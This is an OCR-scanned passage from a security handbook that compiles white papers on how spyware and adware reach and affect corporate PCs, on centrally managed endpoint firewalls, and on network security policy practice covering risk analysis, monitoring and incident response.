Other  programs  are  simple,  ‘useful’  applications  such  as 
clocks,  calendars,  or  mouse  pointers,  which  are  attractive  bait  for 
downloading  spyware. 

Although  similar,  adware  is  distinguished  from  spyware  by  the 
fact  that,  when  downloading  adware,  the  user  is  first  given  an 
opportunity  to  agree  to  its  being  placed  on  his  or  her  computer. 
The  explanation  of  an  adware  program  and  what  it  will  do  is  often 
buried  in  a long,  complex  EULA  that  many  users  simply  scroll 
through  and  accept  without  reading  completely.  In  practice, 
adware  acts  as  spyware.  Both  may  trigger  the  display  of  pop-up  or 
banner  advertisements,  and  both  may  gather  and  transmit  infor- 
mation from  the  user’s  computer. 

How  Spyware  And  Adware  Can  Be  Acquired 

o When  users  unknowingly  give  their  permission  while  down- 
loading or  installing  applications:  Before  installing  most  soft- 
ware programs,  users  are  required  to  read  and  sign  an  End  User 
License  Agreement.  But  EULAs  are  long,  confusing,  and  some- 
times even  deceptive.  From  a legal  standpoint,  everything  may 
be  duly  disclosed  in  the  EULA,  but  EULAs  are  often  so  long  and 
complex  that  many  users  just  click  through  them,  never  stop- 
ping to  read  them  closely. 

o Another  method  bypasses  the  security  settings  altogether  by 
exploiting  a bug  in  Internet  Explorer  versions  4 and  5.  These  ver- 
sions allow  Web  scripts  to  gain  access  to  a hard  drive  by  over- 
flowing the  browser  with  data.  Malicious  Webmasters  use  this 
exploit  to  install  spyware  or  modify  the  way  the  browser  works. 

o By  simply  visiting  certain  Web  sites:  Some  spyware  is  secretly 
downloaded  when  a user  launches  a program  acquired  from  a 
Web  site.  For  example,  a pop-up  may  notify  the  user  that  a spe- 
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cial  plug-in  is  required  to  run  a video  or  movie  file.  In  this  case, 
what  appears  to  be  a legitimate  plug-in  could  actually  be  spy- 
ware.  Some  spyware  takes  advantage  of  known  vulnerabilities 

in  the  Microsoft  Windows  operating  system  and  Internet 
Explorer  browser  to  secretly  place  spyware  onto  the  user’s  com- 
puter. For  example,  one  such  method  involves  pushing  mali- 
cious JavaScript  and  VBScript  code  to  the  user’s  Web  browsers 
when  they  visit  a seemingly  ordinary  Web  page.  If  the  user’s 
Internet  Explorer  security  preferences  are  set  to  the  lowest  lev- 
els, the  code  can  install  spyware  programs  on  the  user’s  hard 
drive  and  even  set  them  so  that  they  launch  automatically  the 
next  time  the  user  reboots.  It  can  also  insert  toolbars  and  other 
objects  into  the  browser  itself,  essentially  changing  the  way  the 
browser  works  in  the  future-all  without  the  user’s  permission. 

o When  users  click  on  a deceptive  or  confusing  pop-up:  Some 
pop-up  screens  don’t  actually  deliver  advertisements  but 
attempt  to  install  unwanted  software  on  your  system  and 
change  your  system  configurations.  These  pop-ups  can  be  very 
clever.  Instead  of  “To  install  this  program,  click  Yes,”  the  prompt 
unexpectedly  reads,  “To  install  this  program,  click  No.”  After 
clicking  on  these  pop-ups,  the  user  may  find  that  the  computer 
now  displays  new  bookmarks  and  a different  home  page  as  well 
as  having  unwanted  software  installed. 

o During  a peer-to-peer  (P2P)  file  transfer  or  software  download: 
Some  spyware  hides  out  in  group  directories  on  P2P  networks, 
such  as  music  sharing  networks,  and  then  spreads  by  infecting 
machines  as  users  search  for  music  selections.  Other  spyware  is 
bundled  with  software  that  the  user  is  intentionally  download- 
ing or  purchasing.  Some  of  these  programs  are  bundled  so  tight- 
ly that,  once  installed,  they  are  nearly  impossible  to  get  rid  of. 


What  Do  Spyware  And  Adware  Do? 

Employees  may  not  even  know  that  their  computers  have  been  infect- 
ed until  they  find  ads  popping  up  all  over  their  desktops.  Or  one  day 
they  may  notice  that  their  computers  are  working  slower  than  usual, 
which  happens  when  spyware  programs  are  uploading  information 
to  a remote  server  or  are  downloading  new  ads.  These  are  only  symp- 
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toms  of  what  can  be  a very  serious  problem  for  an  organisation. 

Because  spyware  and  adware  exist  as  independent  executable 
programs,  these  programs  can  monitor  keystrokes,  scan  files  on 
the  hard  drive,  install  other  spyware  programs,  read  cookies,  and 
change  the  default  home  page  on  the  Web  browser.  The  programs 
continually  relay  this  information  back  to  the  spyware  author, 
who  either  uses  it  for  advertising  or  marketing  purposes  or  sells 
the  information  to  another  party. 

Organisations  whose  very  existence  depends  on  protecting 
their  valuable  intellectual  property  cannot  risk  losing  this  com- 
petitive edge  to  information  thieves.  And  organisations  whose 
investors  and  clients  rely  on  them  to  safeguard  and  protect  per- 
sonal, medical,  and  financial  information,  to  name  just  a few,  can- 
not afford  to  question  whether  critical  information  is  being 
accessed  by  spyware.  Organisations  that  need  to  demonstrate  com- 
pliance with  government  regulations  for  information  security  are 
especially  affected  by  spyware. 

When  spyware  is  part  of  the  corporate  computing  environment, 
capturing  confidential  information  or  secretly  perusing  files  and 
applications,  regulatory  compliance  is  virtually  impossible.  Even  in 
computing  environments  that  encrypt  data,  spyware  remains  a 
threat  to  the  security  of  corporate  data  because  its  keystroke-logging 
components  capture  input  before  it  can  be  encrypted. 

Spyware  and  adware  significantly  increases  the  burden  of  IT 
Help  Desk  staff  by  causing  application  conflicts,  malfunction  of 
legitimate  applications,  and  system  instability.  Many  times,  the  IT 
Help  Desk  staff  may  have  to  re-image  the  desktops/laptops  to  com- 
pletely get  rid  of  problems  caused  by  spyware. 

When  spyware  and  adware  programs  send  information  back  to 
their  home  servers,  they  must  connect  to  the  Internet.  In  doing 
this,  spyware  can  cause  unexpected  lockups  and  many  other  prob- 
lems in  Windows.  When  these  events  occur,  calls  to  IT  Help  Desks 
increase  as  employees  struggle  to  understand  why  their  computers 
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are  crashing  or  business  applications  are  running  more  slowly. 

Some  spyware  binds  itself  to  key  operating  system  files  and 
modifies  critical  registry  entries.  Attempts  to  delete  these  files  can 
limit  or  even  disable  the  system’s  Internet  connection  capabilities. 
For  example,  WebHancer  is  a spyware  program  that  automatically 
launches  at  Windows  startup.  It  monitors  Web  sites  being  viewed 
and  sends  performance  data  back  to  WebHancer’s  servers. 
WebHancer  has  had  conflicts  with  Microsoft  IIS,  causing  problems 
with  ASP  scripts.  It  causes  server  script  ASP  pages  to  stop  functioning 
when  the  Web  application  settings  are  in  medium  and  high  isolation 
modes.  WebHancer  has  modified  the  computer’s  Windows  Sockets 
configuration,  binding  itself  to  Winsock  so  that  all  packets  are 
passed  through  WebHancer.  Deleting  WebHancer  files  may  result  in 
loss  of  ability  to  connect  to  the  Internet.  Employees  who  consider 
themselves  sophisticated  computer  users  may  try  to  locate  and 
delete  spyware  programs  themselves,  inadvertently  creating  even 
greater  problems,  such  as  the  WebHancer  problem  described  above. 

Since  spyware  and  adware  are  piggyback  programs  that  run 
separately  from  the  program  they  accompany,  they  use  additional 
processing  power,  hard  drive  space,  and  network  bandwidth. 
Spyrware  uses  computer  memory  resources  and  consumes  band- 
width as  it  sends  information  back  to  the  spyware’s  home  base  via 
the  user’s  Internet  connection.  Because  spyware  uses  memory  and 
system  resources,  the  applications  running  in  the  background  can 
lead  to  system  crashes  or  general  system  instability.  These  files  also 
consume  a great  deal  of  bandwidth  and  can  create  bottlenecks  for 
critical  business  applications. 

Having  to  close  pop-up  advertising  windows  and  reset  home 
pages  that  have  been  redirected  by  spyware  is  annoying  and  time 
consuming.  Employee  productivity  is  also  affected  by  slow  net- 
work performance  and  system  instability.  Many  times,  employees- 
unaware  of  the  cause  of  their  computer  problems-contact  the  Help 
Desk  frequently  for  support.  This  can  seriously  affect  employee 
productivity  and  places  an  increased  burden  on  Help  Desk  staff. 
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Businesses  that  wish  to  guard  against  spyware,  adware  and  other 
unwanted  applications  will  benefit  from  supplementing  traditional 
protection  methods  (including  firewalls,  intrusion  detection  systems 
and  antivirus  programs)  with  new  strategies  that  address  the  unique 
characteristics  of  spyware.  A comprehensive,  company-wide  spyware- 
prevention  strategy  should  include  multiple  elements: 


1.  Detailed  Acceptable  Use  Policies  (AUP)  For  Company- 
owned  Computers: 

An  effective  company-wide  policy  should  specifically  address  the 
ways  in  which  spyware  may  enter,  including  browsing  to  non- 
work-related  sites,  opening  unsolicited  e-mail  attachments,  and 
installing  unauthorised  and/or  non-work-related  applications.  If 
such  activities  are  allowed,  the  AUP  should  establish  configura- 
tion and  usage  procedures  that  would  help  to  protect  the  compa- 
ny against  inadvertent  pest  installation.  While  AUPs  are  an  effec- 
tive employee  education  method,  they  are  not  sufficient  on  their 
own  to  protect  against  intentional  or  accidental  violations.  It’s  not 
sufficient  to  allow  individual  users  to  employ  their  own  favourite 
anti-spyware  products.  Spyware  can  migrate  from  one  PC  to 
another  attached  to  internal  e-mails  and  other  communications. 
The  best  approach  is  to  use  a networked  anti-spyware  solution  that 
provides  for  a level  of  centralised  management  that  ensure  all 
your  PCs  and  servers  are  covered  and  alerts  the  IT  manager  of  spy- 
ware  incursions. 

2.  Threat-specific  Protection 

Unauthorised  third  parties  will  always  find  new  ways  to  access  for- 
bidden data  or  resources.  As  noted  previously,  anti-virus  programs 
do  not  provide  reliable  protection  against  spyware;  therefore,  ded- 
icated tools  are  required. 

Businesses  considering  the  deployment  of  company-wide  protec- 
tion against  spyware,  adware  and  other  malicious  applications 
will  benefit  from  solutions  that: 
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o Address  legal  and  regulatory  issues:  As  a starting  point,  an 
effective  strategy  should  address  the  local,  national  and  inter- 
national legislation  regarding  confidentiality  and  integrity  of 
customer,  financial  and  employee  data. 

o Minimise  strain  on  computing  resources:  The  software  should 
provide  comprehensive  protection  against  a variety  of  threats 
without  consuming  significant  bandwidth  or  operating 
resources  on  servers  and  client  computers. 

o Decrease  end  user  interaction:  Pest-prevention  software  should 
operate  transparently  so  that  employees  cannot  bypass  or  dis- 
able the  protection. 


o Reduce  IT  overhead:  To  free  IT  staff  to  focus  on  more  strategic 
projects,  the  software  should  offer  automatic  deployment, 
triclcledown  updates  and  centralised  reporting  and  manage- 
ment. 


o Enable  flexible  file  handling:  Because  there  may  be  legitimate 
business  uses  for  potentially  suspect  applications,  such  as  file- 
sharing programs  and  network  packet  sniffers,  administrators 
should  be  able  to  make  case-by-case  decisions  about  which 
kinds  of  tools  may  be  allowed  in  specific  circumstances. 

o Support  the  improvement  of  company-wide  protection:  The 
protection  software  should  offer  comprehensive  event-logging 
capabilities  so  that  administrators  can  spot  trends  and  update 
acceptable  use  policies  and  firewall  configurations  accordingly. 
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II.  Network  Security-Related  Issues 

Source: 

“New  Threats,  New  Solutions:  Enterprise  Endpoint  Security” 
available  at 

download.zonelabs.com/bin/media/pdf/  Hurwitz_wp.pdf 


In  the  rapidly  evolving  world  of  network  security,  there’s  a thin 
line  between  paranoia  and  prudent  protection.  Hackers  are  grow- 
ing in  both  number  and  sophistication,  and  the  stakes  are  rising 
every  day.  New  technologies  have  triggered  a shift  in  the  network 
security  paradigm,  expanding  vulnerability  exponentially. 

Distributed  personal  firewalls  are  needed  to  protect  corporate 
networks  from  Internet-enabled  espionage,  sabotage,  and  vandal- 
ism. Each  individual  PC— local  and  remote— must  employ  security 
technology  to  prevent  known  and  unknown  attacks.  Real-world 
security  needs  to  be  flexible  and  make  intelligent  use  of  Policy 
Lifecycle  Management  to  balance  protection  with  productivity. 

Enterprise  Networks  At  Risk 

As  networks  become  larger,  more  complex,  and  more  distributed, 
corporations  face  a growing  vulnerability  to  hacker  attacks  and 
industrial  espionage.  Security  consciousness  and  security  spend- 
ing are  both  on  the  increase,  but  not  at  a sufficient  pace  to  stay 
ahead  of  the  growing  threat.  The  DefCon  Internet  Security  site 
estimated  that  in  2002,  approximately  19  million  people  had  the 
skills  to  mount  a cyber  attack.  According  to  a CSI/FBI  survey,  a new 
generation  of  profit-motivated  hackers  raised  the  stakes  for  corpo- 
rate security  managers.  They  used  Trojan  horses  such  as  Back 
Orifice,  Sub7,  and  other  custom  spyware  to  control  remote 
machines,  steal  passwords,  and  compromise  corporate  networks. 
Hackers  randomly  scan  for  vulnerabilities  and  deploy  viruses  to 
harvest  IP  addresses  and  information. 

Once  inside,  hackers  can  conduct  espionage  or  sabotage,  steal 
financial  information,  disrupt  business,  and  cause  public  embar- 
rassment. Even  networks  with  VPN  tunnels  are  at  risk.  The  VPN 
will  secure  the  data  in  transit,  but  leaves  the  endpoints  vulnera- 
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ble.  Data  delivered  safely  can  be  harvested  by  Trojans  at  the 
exposed  endpoints.  Whether  a hacker’s  goal  is  vandalism  or  illicit 
profit,  the  costs  can  be  enormous.  Computer  Economics,  an  inde- 
pendent research  firm,  estimated  global  financial  damage  from 
malicious  code  in  2000  at  $17.1  billion.  mi2g,  a London-based  e- 
commerce  research  and  development  company,  put  the  mark  even 
higher,  at  $20  billion. 

New  technologies  have  triggered  a paradigm  shift  in  network 
security.  In  the  old  network  model,  almost  all  PCs  connected  to  the 
Internet  via  a central  gateway.  Guarding  the  gateway  effectively 
created  a defensive  perimeter.  This  model  is  no  longer  adequate. 

First,  while  corporate  networks  shored  up  their  security  with 
centralised  firewalls,  anti-virus  and  intrusion  detection,  hackers 
exposed  other  vulnerabilities.  Second,  the  explosion  of  remote 
and  mobile  users  with  always-on,  broadband  Internet  connections 
to  the  network  means  most  networks  now  have  hundreds,  or  even 
thousands,  of  vulnerable  ‘backdoors’. 

The  Gartner  Group  noted,  “Broadband  connections  are  rife 
with  threats  to  remote  devices.  Viruses,  Trojan  horses,  zombies, 
keystroke  monitoring,  file  shares  and  denial-of-service  attacks  all 
threaten  the  remote  machine  and,  by  extension,  put  the  enter- 
prise’s IT  resources  at  risk.”  Microsoft  and  others  were  hacked  in 
this  way.  Incursions  of  this  sort  can  quickly  turn  into  high-profile 
PR  disasters,  or  worse,  go  undetected  for  months  before  being 
exposed.  Vulnerability  has  expanded  exponentially.  As  companies 
go  from  single  gateways  to  thousands  of  Internet  connected  end- 
points, the  number  of  vulnerabilities  for  networks  has  exploded. 
IDC  reported  the  number  of  remote  users  in  the  year  2000  at  39 
million  and  growing  nine  percent  annually. 

This  accelerating  trend  is  creating  even  more  back  doors.  In  addi- 
tion, laptop  users  physically  bypass  the  firewall  every  day,  and  wire- 
less networks  have  no  definable  boundaries.  Effectively,  the  network 
perimeter  has  disappeared.  Hackers  have  taken  notice,  and  so  have 
government  regulators:  recent  legislation  requiring  tighter  security 
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in  the  healthcare  and  financial  services  industries  is  a telling  sign  of 
the  times,  and  a reminder  of  how  much  we  all  have  to  lose. 

Centrally-Managed  Endpoint  Security 

Prolific  threats  require  a pervasive  solution.  To  reclaim  peace  of 
mind  and  control  of  the  network  perimeter,  each  endpoint  must 
be  secured.  Distributed  endpoint  security,  centrally  managed  per- 
sonal firewalls,  and  application  control  technology  offer  the  best 
defence  against  attacks  that  threaten  corporate  productivity,  data, 
and  reputation.  IDC  notes,  “. . .as  ‘always-on’  Internet  access  grows 
(with  digital  subscriber  line  [DSL]  and  cable  modems)  and  as  more 
companies  allow  telecommuting,  the  need  for  distributed  and 
personal  firewalls  will  grow.”  Consequently,  Peter  Lindstrom  of 
the  Hurwitz  Group  stated,  “The  personal  firewall  may  well 
become  more  significant  in  the  long  run  than  the  corporate  fire- 
wall.” Personal  firewalls  and  application  control  can  also  help 
secure  endpoints  behind  the  corporate  firewall,  by  preventing 
internal  hacking,  unknown  Trojans,  and  spyware  from  exposing 
sensitive  data  outside  the  corporation. 

Similar  to  a corporate  network,  each  individual  PC— local  and 
remote— must  employ  multiple  approaches  to  security  technology. 
Only  a policy-based,  application-oriented  distributed  firewall,  on 
each  and  every  enterprise  PC,  can  provide  the  protection  needed 
to  stop  thousands  of  new  and  unknown  hacking  combinations 
and  techniques. 

For  true  endpoint  security,  a distributed  firewall  must  incorporate 
the  following  functions: 

o Obscure  PCs  to  prevent  outside  access  from  hackers 
o Prevent  applications  from  becoming  hacker  tools  by  allowing 
only  authenticated  and  approved  applications  to  access  the 
Internet 

o Secure  e-mail  attachments  to  prevent  e-mail  from  being  used  as 
a transmission  tool  for  viruses  and  malicious  worms 
o Block,  alert  and  log  intrusions 

o Provide  cooperative  gateway  protection  to  leverage  the  existing 
IS  infrastructure  and  ensure  that  only  endpoints  with  distrib- 
uted firewalls  and  current  security  policy  access  the  network 
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Combined,  these  security  functions  and  others  protect  each  indi 
vidual  PC— local  and  remote.  By  distributing  and  enforcing  PC 
security  and  security  policy  across  all  endpoints,  the  chances  of 
a security  breach  are  greatly  reduced,  thereby  offering  greater  pro 
tection  to  the  entire  network.  Real-world  security  has  to  be  flexi 
ble:  threats,  organisations,  and  corporate  networks  change.  It  is  a 
fact  of  life  that  attackers  will  learn  and  adapt  in  an  attempt  to  cir 
cumvent  defences.  And,  policy  that  once  supported  productivity 
may  later  thwart  it.  Real-world  security  solutions  have  to  evolve  to 
respond  to  new  threats  and  changing  organisational  needs. 

Flexible  security  policy  management  is  critical  for  maintaining 
maximum  corporate  security.  Policy  Lifecycle  Management  is  the 
key  to  maximizing  corporate  security  and  productivity.  Centrally 
managed  policy  provides  an  enforcement  mechanism  to  ensure  all 
endpoints  are  compliant.  Policy  Lifecycle  Management  optimises 
security  by  streamlining  policy  creation  and  providing  feedback, 
enforcing  and  updating  policy  at  all  times. 
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III.  Network  Security:  Best  Practices 

Source:  “Network  Security  Policy:  Best  Practices  White  Paper” 
available  at 

www.cisco.com/warp/public/126/secpol.html 


Without  a security  policy,  the  availability  of  your  network  can  be 
compromised.  The  policy  begins  with  assessing  the  risk  to  the  net- 
work and  building  a team  to  respond.  Continuation  of  the  policy 
requires  implementing  a security  change  management  practice  and 
monitoring  the  network  for  security  violations.  Last,  the  review 
process  modifies  the  existing  policy  and  adapts  to  lessons  learned. 

We  look  here  at  preparation,  prevention,  and  response,  in  detail. 

Preparation 

Prior  to  implementing  a security  policy,  you  must: 
o Create  usage  policy  statements 
o Conduct  a risk  analysis 
o Establish  a security  team  structure 

1.  Creating  Usage  Policy  Statements 

Creating  usage  policy  statements  that  outline  users’  roles  and 
responsibilities  with  regard  to  security  is  recommended.  You  can 
start  with  a general  policy  that  covers  all  network  systems  and 
data  within  your  company.  This  chapter  should  provide  the  gener- 
al user  community  with  an  understanding  of  the  security  policy, 
its  purpose,  guidelines  for  improving  their  security  practices,  and 
definitions  of  their  security  responsibilities.  If  your  company  has 
identified  specific  actions  that  could  result  in  punitive  or  discipli- 
nary actions  against  an  employee,  these  actions  and  how  to  avoid 
them  should  be  clearly  articulated  here. 

The  next  step  is  to  create  a partner-acceptable  use  statement  to 
provide  partners  with  an  understanding  of  the  information  that  is 
available  to  them,  the  expected  disposition  of  that  information,  as 
well  as  the  conduct  of  the  employees  of  your  company.  You  should 
clearly  explain  any  specific  acts  that  have  been  identified  as  secu- 
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rity  attacks  and  the  punitive  actions  that  will  be  taken  should  a 
security  attack  be  detected. 

Last,  create  an  administrator-acceptable  use  statement  to 
explain  the  procedures  for  user  account  administration,  policy 
enforcement,  and  privilege  review.  If  your  company  has  specific 
policies  concerning  user  passwords  or  subsequent  handling  of 
data,  clearly  present  those  policies  as  well.  Check  the  policy 
against  the  partner-acceptable  use  and  the  user  acceptable  use  pol- 
icy statements  to  ensure  uniformity.  Make  sure  that  administrator 
requirements  listed  in  the  acceptable  use  policy  are  reflected  in 
training  plans  and  performance  evaluations. 

2.  Conduct  A Risk  Analysis 

A risk  analysis  should  identify  the  risks  to  your  network,  network 
resources,  and  data.  This  doesn’t  mean  you  should  identify  every 
possible  entry  point  to  the  network,  nor  every  possible  means  of 
attack.  The  intent  of  a risk  analysis  is  to  identify  portions  of  your 
network,  assign  a threat  rating  to  each  portion,  and  apply  an 
appropriate  level  of  security.  This  helps  maintain  a workable  bal- 
ance between  security  and  required  network  access.  Assign  each 
network  resource  one  of  the  following  three  risk  levels: 

o Low  Risk  Systems  or  data  that  if  compromised  (data  viewed  by 
unauthorised  personnel,  data  corrupted,  or  data  lost)  would  not 
disrupt  the  business  or  cause  legal  or  financial  ramifications. 
The  targeted  system  or  data  can  be  easily  restored  and  does  not 
permit  further  access  of  other  systems. 

o Medium  Risk  Systems  or  data  that  if  compromised  (data  viewed 
by  unauthorised  personnel,  data  corrupted,  or  data  lost)  would 
cause  a moderate  disruption  in  the  business,  minor  legal  or 
financial  ramifications,  or  provide  further  access  to  other  sys- 
tems. The  targeted  system  or  data  requires  a moderate  effort  to 
restore  or  the  restoration  process  is  disruptive  to  the  system. 

o High  Risk  Systems  or  data  that  if  compromised  (data  viewed  by 
unauthorised  personnel,  data  corrupted,  or  data  lost)  would 
cause  an  extreme  disruption  in  the  business,  cause  major  legal 
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or  financial  ramifications,  or  threaten  the  health  and  safety  of 
a person.  The  targeted  system  or  data  requires  significant  effort 
to  restore  or  the  restoration  process  is  disruptive  to  the  business 
or  other  systems. 

Assign  a risk  level  to  each  of  the  following:  core  network  devices, 
distribution  network  devices,  access  network  devices,  network 
monitoring  devices,  network  security  devices,  e-mail  systems,  net- 
work file  servers,  network  print  servers,  network  application 
servers  (DNS  and  DHCP),  data  application  servers  (Oracle  or  other 
standalone  applications),  desktop  computers,  and  other  devices 
(standalone  print  servers  and  network  fax  machines).  Network 
equipment  such  as  switches,  routers,  DNS  servers,  and  DHCP 
servers  can  allow  further  access  into  the  network,  and  are  there- 
fore either  medium  or  high  risk  devices.  It  is  also  possible  that  cor- 
ruption of  this  equipment  could  cause  the  network  itself  to  col- 
lapse. Such  a failure  can  be  extremely  disruptive  to  the  business. 

Once  you’ve  assigned  a risk  level,  it’s  necessary  to  identify 
the  types  of  users  of  that  system.  The  five  most  common  types 
of  users  are: 

o Administrators  Internal  users  responsible  for  network  resources 
o Privileged  Internal  users  with  a need  for  greater  access 
o Users  Internal  users  with  general  access 
o Partners  External  users  with  a need  to  access  some  resources 
o Others  External  users  or  customers 

The  identification  of  the  risk  level  and  the  type  of  access 
required  of  each  network  system  forms  the  basis  of  the  following 
security  matrix.  The  security  matrix  provides  a quick  reference  for 
each  system  and  a starting  point  for  further  security  measures, 
such  as  creating  an  appropriate  strategy  for  restricting  access  to 
network  resources. 

3.  Establish  A Security  Team  Structure 

Create  a cross-functional  security  team  led  by  a Security  Manager 
with  participants  from  each  of  your  company’s  operational  areas. 
The  representatives  on  the  team  should  be  aware  of  the  security 
policy  and  the  technical  aspects  of  security  design  and  implemen- 
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System 

Description 

Risk 

Level 

Types  of  Users 

ATM 

switches 

Core 

network 

device 

High 

Administrators  for 
device  configuration 
(support  staff  only);  All 
others  for 
use  as  a transport 

Network 

Routers 

Distribution 

Network 

Device 

High 

Administrators  for 
device  configuration 
(support  staff  only);  All 
others  for  use  as 
a transport 

Closet 

Switches 

Access 

Network 

Device 

Medium 

Administrators  for 
device  configuration 
(support  staff  only);  All 
others  for 
use  as  a transport 

ISDN  or 

dial-up 

servers 

Access 

Network 

Device 

Medium 

Administrators  for 
device  configuration 
(support  staff  only); 
Partners  and  privileged 
users  for  special  access 

Firewall 

Access 

Network 

Device 

High 

Administrators  for 
device  configuration 
(support  staff  only);  All 
others  for  use  as  a trans- 
port. 

DNS  and 

DHCP 

servers 

Network 

Applications 

Medium 

Administrators  for 
configuration;  General 
and  privileged  users  for 
use 

External 

e-mail 

Server 

Network 

Application 

Low 

Administrators  for 
configuration;  All  oth- 
ers for  mail  transport 
between  the  Internet 
and  the  internal  mail 
server 

Internal  E-mail 
Server 

Network 

Application 

Medium 

Administrators  for 
configuration;  All  other 
internal  users  for  use 

Oracle 

Database 

Network 

Application 

Medium  or 
High 

Administrators  for  sys- 
tem administration; 
Privileged  users  for  data 
updates;  General  users 
for  data  access;  All  oth- 
ers for  partial  data  access 
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tation.  Often,  this  requires  additional  training  for  the  team  mem- 
bers. The  security  team  has  three  areas  of  responsibilities:  policy 
development,  practice,  and  response.  Policy  development  is 
focused  on  establishing  and  reviewing  security  policies  for  the 
company.  At  a minimum,  review  both  the  risk  analysis  and  the 
security  policy  on  an  annual  basis.  Practice  is  the  stage  during 
which  the  security  team  conducts  the  risk  analysis,  the  approval 
of  security  change  requests,  reviews  security  alerts  from  both  ven- 
dors and  the  CERT  mailing  list,  and  turns  plain  language  security 
policy  requirements  into  specific  technical  implementations. 

The  last  area  of  responsibility  is  response.  While  network  moni- 
toring often  identifies  a security  violation,  it  is  the  security  team 
members  who  do  the  actual  troubleshooting  and  fixing  of  such  a vio- 
lation. Each  security  team  member  should  know  in  detail  the  securi- 
ty features  provided  by  the  equipment  in  his  or  her  operational  area. 

While  we  have  defined  the  responsibilities  of  the  team  as  a 
whole,  you  should  define  the  individual  roles  and  responsibilities 
of  the  security  team  members  in  your  security  policy. 

Prevention 

Prevention  can  be  broken  into  two  parts:  approving  security 
changes  and  monitoring  security  of  your  network. 

1.  Approving  Security  Changes 

Security  changes  are  defined  as  changes  to  network  equipment 
that  have  a possible  impact  on  the  overall  security  of  the  network. 
Your  security  policy  should  identify  specific  security  configura- 
tion requirements  in  non-technical  terms.  In  other  words,  instead 
of  defining  a requirement  as  “No  outside  sources  FTP  connections 
will  be  permitted  through  the  firewall”,  define  the  requirement  as 
“Outside  connections  should  not  be  able  to  retrieve  files  from  the 
inside  network”.  You’ll  need  to  define  a unique  set  of  require- 
ments for  your  organisation. 

The  security  team  should  review  the  list  of  plain  language 
requirements  to  identify  specific  network  configuration  or  design 
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issues  that  meet  the  requirements.  Once  the  team  has  created  the 
required  network  configuration  changes  to  implement  the  securi- 
ty policy,  you  can  apply  these  to  any  future  configuration  changes. 
While  it’s  possible  for  the  security  team  to  review  all  changes,  this 
process  allows  them  to  only  review  changes  that  pose  enough  risk 
to  warrant  special  treatment. 

We  recommend  that  the  security  team  review  the  following 
types  of  changes: 

o Any  change  to  the  firewall  configuration 
o Any  change  to  access  control  lists  (ACL) 

o Any  change  to  Simple  Network  Management  Protocol  (SNMP) 
configuration 

o Any  change  or  update  in  software  that  differs  from  the 
approved  software  revision  level  list 

It’s  also  recommended  to  adhere  to  the  following  guidelines: 

o Change  passwords  to  network  devices  on  a routine  basis 
o Restrict  access  to  network  devices  to  an  approved  list  of  personnel 
o Ensure  that  the  current  software  revision  levels  of  network 
equipment  and  server  environments  are  in  compliance  with  the 
security  configuration  requirements 

In  addition  to  these  approval  guidelines,  have  a representative 
from  the  security  team  sit  on  the  change  management  approval 
board,  in  order  to  monitor  all  changes  that  the  board  reviews.  The 
security  team  representative  can  deny  any  change  that  is  consid- 
ered a security  change  until  it  has  been  approved  by  the  security 
team. 

2.  Monitoring  Your  Network  Security 

Security  monitoring  is  similar  to  network  monitoring,  except  that  it 
focuses  on  detecting  changes  in  the  network  that  indicate  a security 
violation.  The  starting  point  for  security  monitoring  is  determining 
what  is  a violation.  In  ‘Conduct  a Risk  Analysis’,  we  identified  the 
level  of  monitoring  required  based  on  the  threat  to  the  system.  In 
‘Approving  Security  Changes’,  we  identified  specific  threats  to  the 
network.  By  looking  at  both  these  parameters,  we’ll  develop  a clear 
picture  of  what  you  need  to  monitor  and  how  often. 
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In  the  Risk  Analysis  matrix,  the  firewall  is  considered  a high- 
risk  network  device,  which  indicates  that  you  should  monitor  it 
in  real  time.  From  the  Approving  Security  Changes  section,  you 
see  that  you  should  monitor  for  any  changes  to  the  firewall.  This 
means  that  the  SNMP  polling  agent  should  monitor  such  things 
as  failed  login  attempts,  unusual  traffic,  changes  to  the  firewall, 
access  granted  to  the  firewall,  and  connections  setup  through 
the  firewall. 

Following  this  example,  create  a monitoring  policy  for  each 
area  identified  in  your  risk  analysis.  It’s  recommended  to  monitor 
low-risk  equipment  weekly,  medium-risk  equipment  daily,  and 
high-risk  equipment  hourly.  If  you  require  more  rapid  detection, 
monitor  on  a shorter  time  frame.  Last,  your  security  policy  should 
address  how  to  notify  the  security  team  of  security  violations. 
Often,  your  network  monitoring  software  will  be  the  first  to  detect 
the  violation.  It  should  trigger  a notification  to  the  operations 
centre,  which  in  turn  should  notify  the  security  team,  using  a 
pager  if  necessary. 

3.  Response 

Response  can  be  broken  into  three  parts:  security  violations, 
restoration,  and  review. 

Security  Violations:  When  a violation  is  detected,  the  ability  to 
protect  network  equipment,  determine  the  extent  of  the  intru- 
sion, and  recover  normal  operations  depends  on  quick  decisions. 
Having  these  decisions  made  ahead  of  time  makes  responding  to 
an  intrusion  much  more  manageable. 

The  first  action  following  the  detection  of  an  intrusion  is  the 
notification  of  the  security  team.  Without  a procedure  in  place, 
there  will  be  considerable  delay  in  getting  the  correct  people  to 
apply  the  correct  response.  Define  a procedure  in  your  security 
policy  that  is  available  24  hours  a day,  7 days  a week.  Next  you 
should  define  the  level  of  authority  given  to  the  security  team  to 
make  changes,  and  in  what  order  the  changes  should  be  made. 
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Possible  corrective  actions  are: 

o Implementing  changes  to  prevent  further  access  to  the  violation 
o Isolating  the  violated  systems 

o Contacting  the  carrier  or  ISP  in  an  attempt  to  trace  the  attack 
o Using  recording  devices  to  gather  evidence 
o Disconnecting  violated  systems  or  the  source  of  the  violation 
o Contacting  the  police,  or  other  government  agencies 

o Shutting  down  violated  systems 
o Restoring  systems  according  to  a prioritised  list 
o Notifying  internal  managerial  and  legal  personnel 

Be  sure  to  detail  any  changes  that  can  be  conducted  without 
management  approval  in  the  security  policy.  Last,  there  are  two 
reasons  for  collecting  and  maintaining  information  during  a secu- 
rity attack:  to  determine  the  extent  to  which  systems  have  been 
compromised  by  a security  attack,  and  to  prosecute  external  vio- 
lations. The  type  of  information  and  the  manner  in  which  you  col- 
lect it  differs  according  to  your  goal.  To  determine  the  extent  of 
the  violation,  do  the  following: 

o Record  the  event  by  obtaining  sniffer  traces  of  the  network, 
copies  of  log  files,  active  user  accounts,  and  network  connections 
o Limit  further  compromise  by  disabling  accounts,  disconnecting 
network  equipment  from  the  network,  and  disconnecting  from 
the  Internet 

o Backup  the  compromised  system  to  aid  in  a detailed  analysis  of 
the  damage  and  method  of  attack 
o Look  for  other  signs  of  compromise.  Often  when  a system  is 
compromised,  there  are  other  systems  or  accounts  involved 
o Maintain  and  review  security  device  log  files  and  network  mon- 
itoring log  files,  as  they  often  provide  clues  to  the  method  of 
attack 

If  you’re  interested  in  taking  legal  action,  have  your  legal 
